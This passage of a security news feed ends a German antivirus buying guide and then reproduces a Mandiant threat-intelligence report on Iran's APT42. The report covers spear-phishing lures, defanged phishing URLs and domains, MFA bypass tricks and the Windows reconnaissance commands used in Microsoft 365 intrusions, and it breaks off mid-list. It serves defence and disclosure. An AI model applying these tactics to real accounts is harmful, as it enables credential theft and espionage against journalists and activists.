<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a2699ff86ccb"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/Avast-One-Ransomware-Schutz.jpg?quality=50&amp;strip=all" alt="Avast One Ransomware-Schutz" class="wp-image-2255425" width="1010" height="674" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Schützt mehrere Geräte und blockt unbefugte Webcam-Zugriffe: <a href="https://avastsoftware.pxf.io/c/230135/3867902/18249?subId1=rss&amp;u=https://www.avast.com/de-de/avast-one#pc" target="_blank" rel="noreferrer noopener">Avast One</a> ist relativ preiswert zu haben und kann Smartphones optimieren.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Eine günstige, aber leistungsfähige Lösung für den Spam- und Virenschutz kommt von Avast. Avast One schützt vor Fake-Webseiten, kann unbefugten Zugriff auf die eigene Webcam blockieren und Spam-Nachrichten auf dem Smartphone abwehren. Ähnliche Funktionen finden sich zwar auch bei anderen Anbietern, Avast führt Leistungen aber in einer laienfreundlichen Oberfläche zusammen und bietet Antispam- und Antivirus-Lösungen oft zu relativ günstigen Preisen an.</p>



<p><a href="https://avastsoftware.pxf.io/c/230135/3867902/18249?subId1=rss&amp;u=https://www.avast.com/de-de/avast-one#pc" target="_blank" rel="noreferrer noopener">Hier geht’s zum Angebot</a></p>



<h2 class="wp-block-heading">Norton 360 Deluxe – Top-Virenkiller mit umfangreichem Schutz vor Online-Bedrohungen</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a2699ff8738a"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/11/Norton-Spamschutz.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Norton Spamschutz" class="wp-image-2537903" width="1200" height="825" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Zum Rundum-Paket von Norton gehört auch ein lernfähiger Spamfilter.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Auch bei Norton ist die Funktionsliste in den vergangenen Jahren immer länger geworden. Das Antivirus-Komplettpaket <a href="https://norton.ow5a.net/c/230135/761881/4405?subId1=rss&amp;u=https://de.norton.com/products/norton-360-deluxe" target="_blank" rel="noreferrer noopener">Norton 360 Deluxe</a> beinhaltet inzwischen mehrere Schutzebenen für die digitale Privatsphäre, kann zuverlässig Bedrohungen in Links und Anhängen aufspüren und im Dark Web nach sensiblen persönlichen Daten forschen. Eine Kindersicherung und ein PC-Dienstprogramm zur Erkennung veralteter und anfälliger Software sind ebenfalls an Bord.</p>



<p><a href="https://norton.ow5a.net/c/230135/761881/4405?subId1=rss&amp;u=https://de.norton.com/products/norton-360-deluxe" target="_blank" rel="noreferrer noopener">Hier geht’s zum Angebot</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Uncharmed: Untangling Iran's APT42 Operations]]></title>
<description><![CDATA[Written by: Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, Jonathan Leathery

 
APT42, an Iranian state-sponsored cyber espionage actor, is using enhanced social engineering schemes to gain access to victim networks, including cloud environments. The actor is targeting Western and Middl...]]></description>
<link>https://tsecurity.de/de/3578861/it-security-nachrichten/uncharmed-untangling-irans-apt42-operations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578861/it-security-nachrichten/uncharmed-untangling-irans-apt42-operations/</guid>
<pubDate>Sun, 07 Jun 2026 08:22:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: <span>Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, Jonathan Leathery</span></p>
<hr>
<p> </p></div>
<div class="block-paragraph_advanced"><p><a href="https://cloud.google.com/blog/topics/threat-intelligence/apt42-charms-cons-compromises" rel="noopener" target="_blank"><span>APT42</span></a><span>, an Iranian state-sponsored cyber espionage actor, is using enhanced social engineering schemes to gain access to victim networks, including cloud environments. The actor is targeting Western and Middle Eastern NGOs, media organizations, academia, legal services and activists. Mandiant assesses APT42 operates on behalf of the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC-IO).</span></p>
<p><span>APT42 was observed posing as journalists and event organizers to build trust with their victims through ongoing correspondence, and to deliver invitations to conferences or legitimate documents. These social engineering schemes enabled APT42 to harvest credentials and use them to gain initial access to cloud environments. Subsequently, the threat actor covertly exfiltrated data of strategic interest to Iran, while relying on built-in features and open-source tools to avoid detection.</span></p>
<p><span>In addition to cloud operations, we also outline recent malware-based APT42 operations using two custom backdoors: NICECURL and TAMECAT. These backdoors are delivered via spear phishing, providing the attackers with initial access that might be used as a command execution interface or as a jumping point to deploy additional malware</span><span>.</span></p>
<p><span>APT42 targeting and missions are consistent with its assessed affiliation with the IRGC-IO, which is a part of the Iranian intelligence apparatus that is responsible for monitoring and preventing foreign threats to the Islamic Republic and domestic unrest.</span></p>
<p><span>APT42 activities overlap with the publicly reported actors CALANQUE (Google Threat Analysis Group), </span><span>Charming Kitten (</span><a href="https://www.clearskysec.com/the-kittens-are-back-in-town-3/" rel="noopener" target="_blank"><span>ClearSky</span></a><span> and </span><a href="https://blog.certfa.com/posts/fake-interview-the-new-activity-of-charming-kitten/" rel="noopener" target="_blank"><span>CERTFA</span></a><span>), Mint Sandstorm/Phosphorus (</span><a href="https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/" rel="noopener" target="_blank"><span>Microsoft</span></a><span>), TA453 (</span><a href="https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential" rel="noopener" target="_blank"><span>Proofpoint</span></a><span>), Yellow Garuda (</span><a href="https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/old-cat-new-tricks.html" rel="noopener" target="_blank"><span>PwC</span></a><span>), and ITG18 (</span><a href="https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/" rel="noopener" target="_blank"><span>IBM X-Force</span></a><span>).</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig1.max-1000x1000.png" alt="APT42 operations">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="7bbvp">Figure 1: APT42 operations</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h2><span>Fake News, Real Credentials: Harvesting Microsoft, Yahoo, and Google Credentials</span></h2>
<p><span>APT42 is known for its extensive credential harvesting operations that are often accompanied by tailored spear-phishing campaigns and extensive social engineering. APT42 credential harvesting operations typically include three steps, described in the Figure 2.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig2.max-1000x1000.png" alt="APT42 credential harvesting campaign attack lifecycle">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="7bbvp">Figure 2: APT42 credential harvesting campaign attack lifecycle</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>Mandiant identified at least three clusters of infrastructure used by APT42 to harvest credentials from targets in the policy and government sectors, media organizations and journalists, and NGOs and activists. The three clusters employ similar tactics, techniques and procedures (TTPs) to target victim credentials (spear-phishing emails), but use slightly varied domains, masquerading patterns, decoys, and themes.</span></p>
<p><span>A full list of the infrastructure is available in the Indicators of Compromise (IOCs) section.</span></p>
<h4><span>Cluster A: Posing as News Outlets and NGOs</span></h4>
<ul>
<li role="presentation"><strong>Active:</strong><span> 2021 – today</span></li>
<li role="presentation"><strong>Suspected Targeting:</strong><span> credentials of journalists, researchers, and geopolitical entities in regions of interest to Iran. </span></li>
<li role="presentation"><strong>Masquerading as:</strong><span> The Washington Post (U.S.), The Economist (UK), The Jerusalem Post (IL), Khaleej Times (UAE), Azadliq (Azerbaijan), and more news outlets and NGOs. This often involves the use of typosquatted domains like washin</span><strong>q</strong><span>tonpost[.]press. <br></span><br>Mandiant did not observe APT42 target or compromise these organizations, but rather impersonate them.</li>
<li role="presentation"><strong>Attack vector:</strong><span> Malicious links from typo-squatted domains that are masquerading as news articles likely sent via spear phishing, redirecting the user to fake Google login pages.</span></li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig3.max-1000x1000.png" alt="Jerusalem Post journalist warns of spear-phishing emails sent on her behalf">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="7bbvp">Figure 3: Jerusalem Post journalist warns of spear-phishing emails sent on her behalf</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Cluster B: Posing as Legitimate Services</span></h4>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Active:</strong><span> 2019 – today</span></p>
</li>
</ul>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Targeting:</strong><span> individuals perceived as a threat to the Iranian regime, including researchers, journalists, NGO leaders, and human rights activists.</span></p>
</li>
<li role="presentation"><strong>Masquerading as:</strong><span> generic login pages, file hosting services, and YouTube. The domains use TLDs like .top, .online, .site and .live, and often contain several words separated by hyphens, like panel-live-check[.]online.</span></li>
<li role="presentation"><strong>Attack vector:</strong><span> legitimate links sent via spear phishing, posing as invitations to conferences or legitimate documents hosted on cloud infrastructure. Upon entry, the user is prompted to enter their credentials, which are sent to the attackers.</span></li>
</ul>
<p><span>Mandiant observed several instances of APT42 using Cluster B domains to harvest credentials and host decoy files:</span></p>
<ul>
<li role="presentation"><span>In March 2023, APT42 deployed the domain ksview[.]top in an attempt to redirect to honest-halcyon-fresher[.]buzz, which hosts a fake Gmail login page targeting a freelance journalist, indicating these campaigns are highly tailored to their targets.</span></li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig4.max-1000x1000.png" alt="Fake Gmail login page used by APT42">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="z5e05">Figure 4: Fake Gmail login page used by APT42</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li><span>In March 2023, APT42 sent a spear-phishing email with a fake Google Meet invitation, allegedly sent on behalf of Mona Louri, a likely fake persona leveraged by APT42, claiming to be a human rights activist and researcher. Upon entry, the user was presented with a fake Google Meet page and asked to enter their credentials, which were subsequently sent to the attackers.</span></li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig5.max-1000x1000.png" alt="Twitter account of Mona Louri, a likely fake persona leveraged by APT42">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="u7yj6">Figure 5: Twitter account of Mona Louri, a likely fake persona leveraged by APT42</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li><span>The fake page was hosted on Google Sites (sites[.]google[.]com) webpage creation tool to enhance its legitimacy, and had a reference to a dedicated APT42 domain embedded in its HTML contents, as can be observed in Figure 6 and Figure 7. This activity was also </span><a href="https://twitter.com/NarimanGharib/status/1635333465028857856" rel="noopener" target="_blank"><span>publicly mentioned</span></a><span> on Twitter.</span></li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig6.max-1000x1000.png" alt="Fake Google Meet page deployed by APT42">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ncaat">Figure 6: Fake Google Meet page deployed by APT42</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig7.max-1000x1000.png" alt="APT42 domain embedded in the fake Google Meet page HTML contents">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ncaat">Figure 7: APT42 domain embedded in the fake Google Meet page HTML contents</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li role="presentation"><span>From November through December 2023, APT42 targeted the media and non-profit sectors via spear-phishing emails that included the shortened link of the URL shortening service “n9[.]cl,” which redirected victims to a likely credential harvesting page mimicking Google Drive using the domain “review[.]modification-check[.]online” while others included a link to the same domain without the shortener. The actor additionally shared a benign file via Google Drive as part of this campaign.</span></li>
<li role="presentation"><span>In February 2024, Mandiant observed the APT42 domain nterview[.]site redirecting to the domain admin-stable-right[.]top, which hosted a fake Gmail login page, to target the credentials of a women’s rights activist. The domain nterview[.]site was also observed redirecting to a women’s rights-themed lure allegedly sent by “Jamileh Nedai” (possibly referring to the Iranian filmmaker and women’s rights activist). </span>
<ul>
<li role="presentation">The lure, named “Questionnaire.pdf,” is a PDF document hosted on Dropbox with the headline “Women’s Struggles and Protest.” The document was created by “David Webb,” possibly referring to the Fox News contributor. We have no indication of this individual being targeted by APT42, but rather being spoofed by them, possibly to enhance the decoy's legitimacy.</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig8.max-1000x1000.png" alt="APT42 lure shared via Dropbox (left) containing women’s rights-related content (right)">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="oi6pl">Figure 8: APT42 lure shared via Dropbox (left) containing women’s rights-related content (right)</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li role="presentation"><span>In March 2024, APT42 used the domain shortlinkview[.]live, which redirects to panel-view[.]live, in a campaign targeting a news editor working in a Persian-language news television channel. The final redirection hosts a fake Gmail login page.</span></li>
<li role="presentation"><span>During March 2024, APT42 also used the domain reconsider[.]site to redirect users to a decoy document hosted on Dropbox named “The Secrets of Gaza Tunnels” (titled both in Hebrew and in English), likely leveraging the Israel-Hamas war.</span></li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig9.max-1000x1000.png" alt="Decoy document titled “The secrets of Gaza Tunnels” used by APT42">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="oi6pl">Figure 9: Decoy document titled “The secrets of Gaza Tunnels” used by APT42</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li><span>At the same time, APT42 also used the domain reconsider[.]site to redirect users to last-check-leave[.]buzz and target Google, Microsoft, and Yahoo credentials. This effort was focused on targeting researchers and academia personnel in the U.S., Israel, and Europe.</span></li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig10.max-1000x1000.png" alt="Fake Yahoo and Hotmail  login page used by APT42">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="oi6pl">Figure 10: Fake Yahoo and Hotmail login page used by APT42</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li><span>In addition, Mandiant also observed APT42 deploy fake YouTube login pages and URL shortener pages, likely disseminated via phishing:</span></li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig11.max-1000x1000.png" alt="Fake YouTube login page hosted on an APT42 domain">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="oi6pl">Figure 11: Fake YouTube login page hosted on an APT42 domain</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig12.max-1000x1000.png" alt="Fake URL shortener page hosted on multiple APT42 domains">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="pztuq">Figure 12: Fake URL shortener page hosted on multiple APT42 domains</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h4><span>Cluster C: Posing as “Mailer Daemon,” URL Shortening Services and NGOs</span></h4>
<ul>
<li role="presentation"><strong>Active:</strong><span> 2022 – today</span></li>
<li role="presentation"><strong>Targeting:</strong><span> individuals and entities affiliated with various defense, foreign affairs, and academic issues in the U.S. and Israel.</span>
<ul>
<li role="presentation"><span>Specifically, in November 2023, Mandiant observed this cluster targeting a </span><strong>nuclear physics professor in a major Israeli university</strong><span>, by using the following phishing URL likely masquerading as a legitimate Microsoft 365 login:</span></li>
</ul>
</li>
</ul>
<p><span>hxxps://email-daemon[.]online/</span><strong>&lt;university_acronym&gt;365</strong><span>[.]onmicrosofl[.]com/accountID=</span><strong>&lt;target_handle&gt;</strong></p>
<ul>
<li role="presentation"><strong>Masquerading as:</strong><span> NGOs, “Mailer Daemon,” and Bitly URL shortening service.</span></li>
<li role="presentation"><strong>Attack vector:</strong><span> legitimate links likely sent via spear phishing, posing as invitations to conferences or legitimate documents hosted on cloud infrastructure. Upon entry, the user is prompted to enter their credentials, which are sent to the attackers.</span></li>
</ul>
<p><span>In these cases, Mandiant observed APT42 encode targets or lures using “1337” (</span><span>leet</span><span>) writing. For example, the name of Tamir Pardo (the former head of the Israeli Mossad) was represented in the url </span><span>hxxps://bitly[.]org[.]il/</span><strong>t4m1rpa</strong><span> </span><span>by replacing "a" with 4 and "i" with 1.</span></p>
<ul>
<li role="presentation"><span>APT42 likely attempted to use</span><strong> </strong><span>lures related to the International Counter-Intelligence summit (“ICT-2023”) conducted in Israel, by deploying the following URLs:</span>
<ul>
<li role="presentation"><span>hxxps://bitly[.]org[.]il/J03p4y3r</span></li>
<li role="presentation"><span>hxxps://youtransfer[.]live/</span><strong>ICT-2023</strong><span>/J03py3r</span></li>
</ul>
</li>
</ul>
<h2><span>Head(er) In The Cloud: Targeting Microsoft 365 Environments</span></h2>
<p><span>As an extension of their aforementioned credential harvesting operations, during 2022–2023, Mandiant observed APT42 exfiltrate documents of interest to Iran and sensitive information from the victims’ public cloud infrastructure. These victims were located in the U.S. and the UK in the legal services and NGO sectors. However, since the initial enabler of these operations lies with credential harvesting, which APT42 conducts worldwide, it is possible the victimology is much wider.</span></p>
<p><strong>These operations began with enhanced social engineering schemes to gain the initial access to victim networks</strong><span>, often involving ongoing trust-building correspondence with the victim. Only then the desired credentials are acquired and multi-factor authentication (MFA) is bypassed, by serving a cloned website to capture the MFA token (which failed) and later by sending MFA push notifications to the victim (which succeeded). </span></p>
<p><span>These techniques have allowed APT42 to </span><strong>covertly access and compromise the victim’s Microsoft 365 environment</strong><span>, relying on built-in features and open-source tools to decrease their chances of being detected.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig13.max-1000x1000.png" alt="APT42 Cloud Operations Attack Lifecycle">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="pztuq">Figure 13: APT42 cloud operations attack lifecycle</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>APT42 cloud operations attack lifecycle can be described in details as follows:</span></p>
<ul>
<li role="presentation"><strong>Social engineering schemes involving decoys and trust building, </strong><span>which includes masquerading as legitimate NGOs and conducting ongoing correspondence with the target, sometimes lasting several weeks. </span>
<ul>
<li role="presentation"><span>The threat actor masqueraded as well-known international organizations in the legal and NGO fields and sent emails from domains typosquatting the original NGO domains, for example aspenlnstitute[.]org</span><span>. </span>
<ul>
<li role="presentation">The Aspen Institute became aware of this spoofed domain and collaborated with industry partners, including blocking it in SafeBrowsing, thus protecting users of Google Chrome and additional browsers.</li>
<li role="presentation">To increase their credibility, APT42 impersonated high-ranking personnel working at the aforementioned organizations when creating the email personas.</li>
</ul>
</li>
<li role="presentation">APT42 enhanced their campaign credibility by using decoy material inviting targets to legitimate and relevant events and conferences. In one instance, the decoy material was hosted on an attacker-controlled SharePoint folder, accessible only after the victim entered their credentials. Mandiant did not identify malicious elements in the files, suggesting they were used solely to gain the victim’s trust.</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig14.max-1000x1000.png" alt="APT42 controlled Sharepoint folder containing PDF lures">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="nxz7u">Figure 14: APT42 controlled SharePoint folder containing PDF lures</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li role="presentation"><strong>Credential harvesting and bypassing MFA.</strong><span> Only after a certain level of trust was built with the victim, APT42 harvested the desired credentials by sending the victim a link that would redirect them to a credential harvesting site, similar to the process described in the previously discussed credential theft section. </span>
<ul>
<li role="presentation"><span>Mandiant observed the use of Javascript files to redirect victims from these links to ultimately serve fake Microsoft 365 login pages.</span></li>
<li role="presentation"><span>At least once, Mandiant observed APT42 use several methods—both SharePoint login and fake LinkedIn login pages—to target multiple high-profile personnel of the victim organization during the same campaign.</span></li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig15.max-1000x1000.png" alt="APT42 fake LinkedIn login page">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="nxz7u">Figure 15: APT42 fake LinkedIn login page</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li>
<ul>
<li role="presentation"><strong>Mandiant observed APT42 deploy two methods to bypass MFA</strong><span>: First, APT42 made attempts to acquire MFA tokens by using fake DUO pages, using subdomains with prefixes such as “api-&lt;generated_id&gt;[.]...” or using words like “duo”. When this failed, the actor sent authentication prompts to victims upon attempts to login, which succeeded. <br><br></span><span>In a different intrusion, APT42 likely served a phishing site to capture the MFA token sent via SMS and leveraged the KMSI (Keep-me-Signed-In) feature to avoid reauthentication.</span></li>
<li role="presentation"><span>In at least one instance, APT42 established a “persistent” login mechanism </span><strong>leveraging the Microsoft </strong><a href="https://support.microsoft.com/en-us/account-billing/using-app-passwords-with-apps-that-don-t-support-two-step-verification-5896ed9b-4263-e681-128a-a6f2979a7944" rel="noopener" target="_blank"><strong>app password</strong></a><strong> feature, likely in attempts to preserve ongoing access for future logins</strong><span> without the need to re-verify their identity with MFA.</span>
<ul>
<li role="presentation"><span>Microsoft’s app password feature is intended to be used with applications or devices that do not support MFA, and thus generates single-use passwords that do not require MFA. The feature is not enabled by default, and can be activated manually. Once this feature is enabled, any logged in user can create app passwords.</span></li>
<li role="presentation"><span>APT42 leveraged the fact that the app password feature was enabled to create an app password for the compromised account. However, Mandiant has no indication that APT42 actually used it.</span></li>
</ul>
</li>
</ul>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/untangling-apt42-fig16.max-1000x1000.png" alt="Microsoft app-password settings, exploited by APT42 for continuous MFA bypass">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="s086w">Figure 16: Microsoft app password settings, exploited by APT42 for continuous MFA bypass</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><ul>
<li role="presentation"><strong>Covert exfiltration of data from the Microsoft 365 environment</strong><span>, including OneDrive documents, Outlook emails, and documents of potential interest to Iran including files pertaining its foreign affairs or the Persian Gulf region.<br><br></span><strong>The M365 infiltration and data exfiltration included the following stages:</strong>
<ul>
<li role="presentation"><span>Logging in to the victim email using Thunderbird email client, whose usage was approved by the attacker altering the user permissions.</span></li>
<li role="presentation"><span>Logging into the victim’s Citrix application and using Windows Remote Desktop Protocol (RDP). Upon entry, the attackers explored, enumerated, and staged files for exfiltration in password-protected 7-ZIP archives.</span>
<ul>
<li role="presentation"><span><span>The attacker performed host, network, and directory reconnaissance using Windows native commands including:<br><br></span></span>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td><span>"whoami," "net view," "cd," "explorer," "net share," "hostname," "ls," "type," "ping," "net user," "gci," "mkdir," "notepad," "mv," "exit," "rm," "dir," and "del."</span></td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
